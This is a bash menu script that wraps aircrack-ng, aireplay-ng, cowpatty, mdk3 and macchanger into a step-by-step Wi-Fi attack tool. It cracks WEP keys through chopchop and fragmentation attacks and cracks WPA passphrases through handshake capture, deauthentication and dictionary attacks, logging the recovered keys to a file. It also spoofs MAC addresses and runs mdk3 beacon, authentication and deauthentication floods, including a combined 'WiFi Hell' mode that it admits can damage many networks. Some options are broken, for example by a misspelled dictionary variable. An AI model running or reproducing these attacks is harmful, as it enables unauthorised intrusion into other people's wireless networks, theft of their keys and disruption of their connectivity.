  1. #!/bin/bash
  2. MYMAC=06:15:AF:67:96:24
  3. #MYMAC=`ifconfig ath0 | awk /HW/'{print $5}'`
  4. File=/tmp/.HOSTADD
  5. {
  6. read HOSTADD
  7. } < $File
  8. File=/tmp/.APNAME
  9. {
  10. read APNAME
  11. } < $File
  12. File=/tmp/.APADD
  13. {
  14. read APADD
  15. } < $File
  16. File=/tmp/.CHAN
  17. {
  18. read CHAN
  19. } < $File
  20. clear
  21. function showMenu
  22. {
  23.     echo ""
  24.     echo -n "Press enter to continue..."
  25.     read
  26.     clear
  27.     mainMenu
  28. }
  29. function Enter
  30. {
  31.     echo ""
  32.     echo -n "Press enter to continue..."
  33.     read
  34.     clear
  35. }
  36. function Details
  37. {
  38. echo "Host MAC: "$HOSTADD
  39. echo "Access point MAC: "$APADD
  40. echo "Access point name: "$APNAME
  41. echo "Channel: "$CHAN
  42. }
function showAP
{
# Display the access points recorded by the stage 2 airodump-ng run
# (~/dump-01.txt). Presumably that file holds an AP table followed by a
# "Station" table; only the part above the Station line is shown here.
#
# Line number of the "Station" line. NOTE(review): assumes exactly one line
# matches; with several matches this expands to several words and the head
# call below treats the extra ones as file names.
ap_array=`cat ~/dump-01.txt | grep -a -n Station | awk -F : '{print $1}'`
# Copy everything up to and including that line to a scratch file
# (&> also sends head's stderr there).
head -n $ap_array ~/dump-01.txt &> ~/dump-02.txt
clear
echo ""
echo "           MAC            CHAN    SECU    POWER   #CHAR   SSID"
echo "========================================================================"
# Comma-split read; the field names presumably mirror the CSV column order.
# An ESSID containing a comma shifts every later column.
while IFS=, read MAC FTS LTS CHANNEL SPEED PRIVACY CYPHER AUTH POWER BEACON IV LANIP IDLENGTH ESSID KEY;do
 longueur=${#MAC}
   # Only rows whose first field is at least 17 characters (a full MAC) are
   # treated as data; header and blank lines fall through.
   if [ $longueur -ge 17 ]; then
    echo -e "    "$MAC"\t""|"$CHANNEL"\t""|"$PRIVACY"\t""|"$POWER"\t""|"$IDLENGTH"\t""|"$ESSID
    aidlenght=$IDLENGTH
    # NOTE(review): i is never assigned in this script, so every row lands
    # at index 0; these arrays are also not read anywhere else here.
    assid[$i]=$ESSID
    achannel[$i]=$CHANNEL
    amac[$i]=$MAC
    aprivacy[$i]=$PRIVACY
   fi
done < ~/dump-02.txt
}
  63.  
# Clear the screen, print the numbered stage list and the stage prompt
# (no trailing newline so the answer is typed on the same line).
mainMenu () {
    local stages=(
        "Put card in correct mode"
        "Scan for access points and hosts"
        "Specify access point"
        "Authenticate client with access point"
        "Attacks and packet creation"
        "Capture ARP packet"
        "Crack WEP key"
        "Clean up files"
        "Other options"
        "Exit"
    )
    local n=1
    local s
    clear
    for s in "${stages[@]}"; do
        printf 'Stage %d. %s\n' "$n" "$s"
        n=$((n + 1))
    done
    printf '\nWhat stage are you at? '
}
  79. while [ 1 ]
  80. do
  81. mainMenu
  82. read STAGE
  83. case "$STAGE" in
  84.  
  85. "1")
  86. clear
  87. echo "1. Monitor mode"
  88. echo "2. Managed mode"
  89. echo "3. Back"
  90. echo -n "Please select a mode: "
  91. read MODE
  92. if [ $MODE == 1 ]; then
  93.     ifconfig ath0 down
  94.     wlanconfig ath0 destroy
  95.     wlanconfig ath0 create wlandev wifi0 wlanmode monitor -bssid
  96.     ifconfig ath0 up
  97.     showMenu
  98.     clear
  99. elif [ $MODE == 2 ]; then
  100.     ifconfig ath0 down
  101.     wlanconfig ath0 destroy
  102.     wlanconfig ath0 create wlandev wifi0 wlanmode managed -bssid
  103.     ifconfig ath0 up
  104.     showMenu
  105.     clear
  106. elif [ $MODE == 3 ]; then
  107.     mainMenu
  108.     clear
  109.     else
  110.     echo "no option selected"
  111.     showMenu
  112. fi
  113. ;;
  114.  
  115. "2")
  116. clear
  117. #Stronger signals can be achieved by specifying a channel.
  118. echo "For a range of channels type 1-14"
  119. echo
  120. echo -n "What channel(s) do you want to scan? "
  121. read CHANNEL
  122. airodump-ng -c $CHANNEL -w ~/dump ath0
  123. showMenu
  124. clear
  125. ;;
  126.  
  127. "3")
  128. showAP
  129. echo
  130. echo -n "specify access point MAC address: "
  131. read APADD
  132. echo -n "specify the name of the access point: "
  133. read APNAME
  134. echo -n "specify host address, this MAC is ($MYMAC): "
  135. read HOSTADD
  136. echo -n "specify channel: "
  137. read CHAN
  138. echo "Locking channel..."
  139. airmon-ng stop ath0
  140. airmon-ng start wifi0 $CHAN
  141. echo $CHAN > /tmp/.CHAN
  142. echo $HOSTADD > /tmp/.HOSTADD
  143. echo $APNAME > /tmp/.APNAME
  144. echo $APADD > /tmp/.APADD
  145. clear
  146. ;;
  147.  
  148. "4")
  149. clear
  150. echo "1. Constant (keepalive packets sent)"
  151. echo "2. Single (just a single authentication)"
  152. echo "3. Back"
  153. echo -n "Which type of authentication would you like to take place? "
  154. read CALM
  155. if [ $CALM = 1 ]; then
  156.     clear
  157.     Details
  158.     echo
  159.     echo "Associating you with the specified AP"
  160.     aireplay-ng -1 6000 -o 6 -q 10 -e $APNAME -a $APADD -h $HOSTADD ath0
  161.     showMenu
  162.     clear
  163. elif [ $CALM = 2 ]; then
  164.     clear
  165.     Details
  166.     echo
  167.     echo "Associating you with the specified AP - Do not close this until attack has finished"
  168.     aireplay-ng -1 0 -e $APNAME -a $APADD -h $HOSTADD ath0
  169.     showMenu
  170.     clear
  171. elif [ $CALM == 3 ]; then
  172.     clear
  173.     showMenu
  174.     else
  175.     clear
  176.     echo "no option selected"
  177.     showMenu
  178. fi
  179. ;;
  180.  
  181. "5")
  182. clear
  183. echo "1. Chopchop attack"
  184. echo "2. Fragmentation attack"
  185. echo "3. Back"
  186. echo -n "Specify an attack: "
  187. read ATTACK
  188. if [ $ATTACK = 1 ]; then
  189.     clear
  190.     Details
  191.     echo
  192.     echo -n "Specify minimum packet size (0 for any): "
  193.     read MIN
  194.     echo -n "Enter maximum packet size (Smaller size means faster cracking): "
  195.     read MAX
  196.     echo
  197.     echo "Launching chop chop attack"
  198.     aireplay-ng -4 -m $MIN -n $MAX -h $HOSTADD -b $APADD ath0
  199.     packetforge-ng -0 -a $APADD -h $HOSTADD -k 255.255.255.255 -l 255.255.255.255 -y *.xor -w arp-request
  200.     aireplay-ng -2 -r arp-request ath0
  201.     showMenu
  202.     clear
  203.     #Same syntax, just launches fragment attack instead.
  204. elif [ $ATTACK = 2 ]; then
  205.     clear
  206.     #go to function details
  207.     Details
  208.     echo
  209.     echo -n "Specify minimum packet size (0 for any): "
  210.     read MIN
  211.     echo -n "Enter maximum packet size (Smaller size means faster cracking): "
  212.     read MAX
  213.     echo
  214.     echo "Launching fragmentation attack"
  215.     aireplay-ng -5 -m $MIN -n $MAX -b $APADD -h $HOSTADD ath0
  216.     packetforge-ng -0 -a $APADD -h $HOSTADD -k 255.255.255.255 -l 255.255.255.255 -y *.xor -w arp-request
  217.     aireplay-ng -2 -r arp-request ath0
  218.     showMenu
  219.     clear
  220. elif [ $ATTACK == 3 ]; then
  221.     mainMenu
  222.     else
  223.     echo "no option selected"
  224. fi
  225. ;;
  226.  
  227. "6")
  228. Details
  229. echo
  230. echo "Capturing the arp packet"
  231. airodump-ng -c $CHAN --bssid $APADD -w capture ath0
  232. showMenu
  233. clear
  234. ;;
  235.  
  236. "7")
  237. aircrack-ng -z -b $APADD capture*.cap | tee raw.file
  238. Enter
  239. tail -4 raw.file | awk '{ print $4; }' | tr -d : > ap.key
  240. KEY=`cat ap.key`
  241. hwclock | awk '{ print $1,$2,$3,$4,$5; }' >> ~/cracked.txt
  242. echo "Name: "$APNAME >> ~/cracked.txt
  243. echo "MAC: "$APADD >> ~/cracked.txt
  244. echo "WEP Key: "$KEY >> ~/cracked.txt
  245. echo >> ~/cracked.txt
  246. rm ap.key
  247. rm raw.file
  248. clear
  249. echo "Name: "$APNAME
  250. echo "MAC: "$APADD
  251. echo "WEP Key: "$KEY
  252. showMenu
  253. clear
  254. ;;
  255.  
  256. "8")
  257. rm -v *.xor
  258. rm -v .XO-lock
  259. rm -v /tmp/.X0-lock
  260. rm -v arp-*
  261. rm -v psk*
  262. rm -v capture*
  263. rm -v /tmp/.HOSTADD
  264. rm -v /tmp/.APNAME
  265. rm -v /tmp/.APADD
  266. rm -v /tmp/.CHAN
  267. rm -v *.cap
  268. #rm -v ~dump*
  269. rm -v ~/dump*
  270. rm -iv ~/*.hash
  271. showMenu
  272. clear
  273. ;;
  274.  
  275. "9")
  276. clear
  277. echo "1. Crack WPA"
  278. echo "2. Run MDK3 attacks"
  279. echo "3. Spoof/restore MAC address"
  280. echo "4. Back"
  281. echo
  282. echo -n "What do you want to do? "
  283. read ADVANCED
  284.  
  285. #WPA
  286.     if [ $ADVANCED == 1 ]; then
  287.         clear
  288.         echo "1. Sniff key for 4-way handshake (top right)"
  289.         echo "2. Deauthentify connected clients"
  290.         echo "3. Run standard dictionary attack"
  291.         echo "4. Use cowpatty to generate a hash file and brute force the key (quicker)"
  292.         echo "5. Back"
  293.         echo
  294.         echo "A connected client will be needed to pick up the handshake."
  295.         echo -n "Select a step: "
  296.         read STEP
  297.         if [ $STEP == 1 ]; then  
  298.             airodump-ng -c $CHAN --bssid $APADD -w psk ath0
  299.             showMenu
  300.        
  301.         elif [ $STEP == 2 ]; then
  302.             clear
  303.             echo -n "Specify a MAC to deauth: "
  304.             read DEAUTH
  305.             echo -n "How many deauthentication packets do you want to send? "
  306.             read PACKETS
  307.             aireplay-ng -0 $PACKETS -e $APNAME -a $APADD -c $DEAUTH ath0
  308.             echo
  309.        
  310.         elif [ $STEP == 3 ]; then
  311.             echo -n "Type in the location of your dictionary:  "
  312.             read DICTLOCATE
  313.             aircrack-ng -a 2 -w "$DICTLOCTE" -b $APADD psk*.cap | tee raw.file
  314.             Enter          
  315.             tail -4 raw.file | awk '{ print $4; }' | tr -d : > ap.key
  316.             KEY=`cat ap.key`
  317.             hwclock | awk '{ print $1,$2,$3,$4,$5; }' >> ~/cracked.txt
  318.             echo "Name: "$APNAME >> ~/cracked.txt
  319.             echo "MAC: "$APADD >> ~/cracked.txt
  320.             echo "WPA Phrase: "$KEY >> ~/cracked.txt
  321.             echo >> ~/cracked.txt
  322.             rm ap.key
  323.             rm raw.file
  324.             clear
  325.             echo "Name: "$APNAME
  326.             echo "MAC: "$APADD
  327.             echo "WPA Passphrase: "$KEY
  328.             mainMenu
  329.             clear
  330.            
  331.         elif [ $STEP == 4 ]; then
  332.             clear
  333.             echo -n "Do you have a hash file for $APNAME? "
  334.             read HASH
  335.                 if [ $HASH = y ]; then
  336.                     echo -n "Type hash file location: "
  337.                     read HASHLOCATE
  338.                     cowpatty -v -r psk*.cap -d $HASHLOCATE -s "$APNAME" >> raw.file
  339.                     tail -3 raw.file | grep PSK | awk '{ print $4; }' | tr -d .'"' > ap.key
  340.                     KEY=`cat ap.key`
  341.                     hwclock | awk '{ print $1,$2,$3,$4,$5; }' >> ~/cracked.txt
  342.                     echo "Name: "$APNAME >> ~/cracked.txt
  343.                     echo "MAC: "$APADD >> ~/cracked.txt
  344.                     echo "WPA Key: "$KEY >> ~/cracked.txt
  345.                     echo >> ~/cracked.txt
  346.                     rm ap.key
  347.                     rm raw.file
  348.                     clear
  349.                     Enter
  350.                     echo "Name: "$APNAME
  351.                     echo "MAC: "$APADD
  352.                     echo "WPA Passphrase: "$KEY
  353.                     mainMenu
  354.                     clear
  355.        
  356.                 elif [ $HASH = n ]; then
  357.                     echo "A dictionary file will be needed."
  358.                     echo -n "Type in the location of your dictionary: "
  359.                     read DICTLOCATE
  360.                     echo "Generating hash file, this could take some time..."
  361.                     genpmk -v -f $DICTLOCATE -d $APNAME.hash -s "$APNAME"
  362.                     Enter
  363.                     echo
  364.                     echo
  365.                     echo "The has file has now been generated, running attack using hash file."
  366.                     cowpatty -v -r psk*.cap -d $APNAME.hash -s $APNAME >> raw.file
  367.                     tail -3 raw.file | grep PSK | awk '{ print $4; }' | tr -d .'"' > ap.key
  368.                     KEY=`cat ap.key`
  369.                     hwclock | awk '{ print $1,$2,$3,$4,$5; }' >> ~/cracked.txt
  370.                     echo "Name: "$APNAME >> ~/cracked.txt
  371.                     echo "MAC: "$APADD >> ~/cracked.txt
  372.                     echo "WPA Key: "$KEY >> ~/cracked.txt
  373.                     echo >> ~cracked.txt
  374.                     rm ap.key
  375.                     rm raw.file
  376.                     clear
  377.                     Enter
  378.                     echo "Name: "$APNAME
  379.                     echo "MAC: "$APADD
  380.                     echo "WPA Passphrase: "$KEY
  381.                     mainMenu
  382.                     clear
  383.                 else
  384.                     echo "...no option selected"
  385.                     clear
  386.                     mainMenu
  387.                 fi
  388.        
  389.         elif [ $STEP == 5 ]; then
  390.             mainMenu
  391.             clear
  392.         else
  393.             echo "...no option selected"
  394.             sleep 3
  395.             clear
  396.         fi
  397.  
  398.     #MDK3
  399.     elif [ $ADVANCED == 2 ]; then
  400.         mdk3men
  401.         clear
  402.         mdk3men () {
  403.         echo "1. Specify details"
  404.         echo "2. Beacon flood"
  405.         echo "3. Authentication flooding"
  406.         echo "4. Deauthentication mode (amok mode)"
  407.         echo "5. Cancel all traffic continuesly"
  408.         echo "6. Standard packet flooding"
  409.         echo "7. Cause IDS systems to recognise access points as rogues"
  410.         echo "8. MAC bruteforce attack on access points implementing filtering"
  411.         echo "9. Retrieve an SSID"
  412.         echo "10. 'WiFi Hell' - attacks 2-5 simultaneously"
  413.         echo "11. Back"
  414.         echo
  415.         echo -n "What would you like do? "
  416.                 }
  417.         while [ 1 ]
  418.             do
  419.             mdk3men
  420.             read MDKCHOICE
  421.             case "$MDKCHOICE" in
  422.  
  423.     "1")
  424.     showAP
  425.     echo
  426.     echo "If any of the following is unknown just press enter"
  427.     echo
  428.     echo -n "What is the MAC address of the access point: "
  429.     read ESID
  430.     echo -n "What is the name of the access point: "
  431.     read SSID
  432.     echo -n "What channel do you want to use? "
  433.     read CH
  434.     echo -n "Do you want to put your card in attack mode? "
  435.     read ANSWER
  436.         if [ $ANSWER = y ]; then     
  437.             echo "putting WiFi card in correct mode"
  438.             ifconfig ath0 down
  439.             wlanconfig ath0 destroy
  440.             wlanconfig ath0 create wlandev wifi0 wlanmode monitor
  441.             sleep 1
  442.             iwconfig ath0 channel 1 rate 1M
  443.             mdk3men
  444.             clear
  445.         elif [ $ANSWER = n ]; then
  446.             mdk3men
  447.             clear
  448.         else
  449.             echo "...no option selected"
  450.             sleep 3
  451.             clear
  452.         fi
  453.             ;;
  454.  
  455.     "2")
  456.     clear
  457.     echo -n "Create fake access points... "
  458.     sleep 2
  459.     clear
  460.     echo "Press enter to skip questions..."
  461.     echo -n "Access point name (enter for random): "
  462.         read NAME
  463.         NAME="-n $NAME"
  464.     echo -n "Access point channel (enter for random): "
  465.         read ATTACKCHANNEL
  466.         ATTACKCHANNEL="-h -c $ATTACKCHANNEL"
  467.     mdk3 ath0 b -g $ATTACKCHANNEL $NAME
  468.     clear
  469.     ;;
  470.  
  471.     "3")
  472.     clear
  473.     echo "Sends fake authentication frames to "$SSID
  474.     sleep 2
  475.     mdk3 ath0 a -i $ESID
  476.     clear
  477.     ;;
  478.  
  479.     "4")
  480.     clear
  481.     echo "Deauthentify traffic from channel specified"
  482.     echo -n "What channel(s) would you like to disassociate? "
  483.     read CH
  484.     sleep 2
  485.     mdk3 ath0 d -c $CH
  486.     break
  487.     clear
  488.     ;;
  489.  
  490.     "5")
  491.     clear
  492.     echo "Cancel all traffic on "$SSID
  493.     sleep 2
  494.     mdk3 ath0 m -w 5 -t $ESID
  495.     clear
  496.     ;;
  497.  
  498.     "6")
  499.     clear
  500.     echo "Flooding packets on "$SSID
  501.     sleep 2
  502.     mdk3 ath0 x 0 -n $SSID -t $ESID
  503.     clear
  504.     ;;
  505.  
  506.     "7")
  507.     clear
  508.     echo "IDS's will identify $SSID as a rogue access point"
  509.     sleep 2
  510.     mdk3 ath0 w -e $SSID
  511.     clear
  512.     ;;
  513.  
  514.     "8")
  515.     clear
  516.     echo "Brute force allowed MAC to bypass MAC filtering" $SSID
  517.     sleep 2
  518.     mdk3 ath0 f -t $ESID
  519.     sleep 5
  520.     clear
  521.     mdk3men
  522.     ;;
  523.  
  524.     "9")
  525.     clear
  526.     echo "Brute forcing the SSID, use this attack to find a hidden access point name"
  527.     echo "(It may be quicker to observe and deauth connected clients)"
  528.     sleep 3
  529.     echo -n "Type dictionary location: "
  530.     read WORDS
  531.     mdk3 ath0 p -c $CH -t $ESID -f $WORDS
  532.     clear
  533.     ;;
  534.  
  535.     "10")
  536.     clear
  537.     echo "WARNING"
  538.     echo "======="
  539.     echo "This has the potential to cause damage to a lot of networks..."
  540.     echo
  541.     echo -n "Press enter if your sure you want to do this..."
  542.     read
  543.     clear
  544.     echo "1. The beacon flood will prevent people from recognising the correct AP."
  545.     echo "2. Authentication flood will prevent the access point from recognising real clients."
  546.     echo "3. Deauthentication flood will kill all clients (if any connect)."
  547.     echo "4. IDS confusion mode will cross-connect kicked clients to real and fake APs."
  548.     echo
  549.     echo "Launching in 3 seconds"
  550.     sleep 3
  551.  
  552.     function beacon {
  553.     xterm $HOLD $TOPRIGHT -geometry 62x15 -title "Beacon flood" -hold -e mdk3 ath0 b -n $SSID -c $CH
  554.     }
  555.  
  556.     function authflood {
  557.     xterm $HOLD $TOPLEFT -geometry 62x15 -title "Authentication flood" -hold -e mdk3 ath0 a -i $ESID
  558.     }
  559.  
  560.     function deauthflood {
  561.     xterm $HOLD $BOTTOMRIGHT -geometry 62x15 -title "Deauthentication flood" -hold -e mdk3 ath0 d -c $CH
  562.     }
  563.     function confusion {
  564.     xterm $HOLD $BOTTOMLEFT -geometry 62x15 -title "IDS confusion" -hold -e mdk3 ath0 w -e $SSID -c$CH
  565.     }
  566.  
  567.     authflood & beacon & deauthflood & confusion
  568.     clear
  569.     ;;
  570.  
  571.     11)
  572.     break
  573.     ;;
  574.  
  575.     *)
  576.     clear
  577.     echo "no option selected"
  578.     mdk3men
  579.     ;;
  580.  
  581.         esac
  582.         done
  583.  
  584.     elif [ $ADVANCED == 3 ]; then
  585.         clear
  586.         echo "1. Spoof a MAC"
  587.         echo "2. Restore MAC"
  588.         echo "3. Back"
  589.         echo
  590.         echo -n "Please select an option: "
  591.         read MACOPT
  592.             if [ $MACOPT == 1 ]; then
  593.                 echo -n "Type new MAC address (syntax is FF:FF:FF:FF:FF:FF): "
  594.                 read MACSPOOF
  595.                 ifconfig ath0 down
  596.                 ifconfig wifi0 down
  597.                 echo "ath0"
  598.                 macchanger -m $MACSPOOF ath0
  599.                 echo "wifi0"
  600.                 macchanger -m $MACSPOOF wifi0
  601.                 sleep 3
  602.                 ifconfig wifi0 up
  603.                 ifconfig ath0 up
  604.                 mainMenu
  605.             elif [ $MACOPT == 2 ]; then
  606.                 #this mac = $MYMAC
  607.                 ifconfig ath0 down
  608.                 ifconfig wifi0 down
  609.                 echo "ath0"
  610.                 macchanger -m $MYMAC ath0
  611.                 echo "wifi0"
  612.                 macchanger -m $MYMAC wifi0
  613.                 sleep 3
  614.                 ifconfig ath0 up
  615.                 ifconfig wifi0 up
  616.                 mainMenu
  617.             elif [ $MACOPT == 3 ]; then
  618.                 mainMenu
  619.             else
  620.                 echo "no option selected"
  621.             fi
  622.     elif [ $ADVANCED == 4 ]; then
  623.         mainMenu
  624.         clear
  625.     else
  626.         echo "no option selected"
  627. fi
  628. ;;
  629.  
  630. "10")
  631. echo -n "Return card to managed mode? "
  632. read MODE
  633.     if [ $MODE == y ]; then
  634.         sleep 2
  635.         ifconfig ath0 down
  636.         wlanconfig ath0 destroy
  637.         wlanconfig ath0 create wlandev wifi0 wlanmode managed -bssid
  638.         ifconfig ath0 up
  639.         clear
  640.         exit
  641.     elif [ $MODE == n ]; then
  642.         clear
  643.         exit
  644.     else
  645.         echo "no option selected"
  646.     fi
  647.     ;;
  648.  
  649. *)
  650. echo "no option selected"
  651. showMenu
  652. ;;
  653.  
  654. esac
  655. done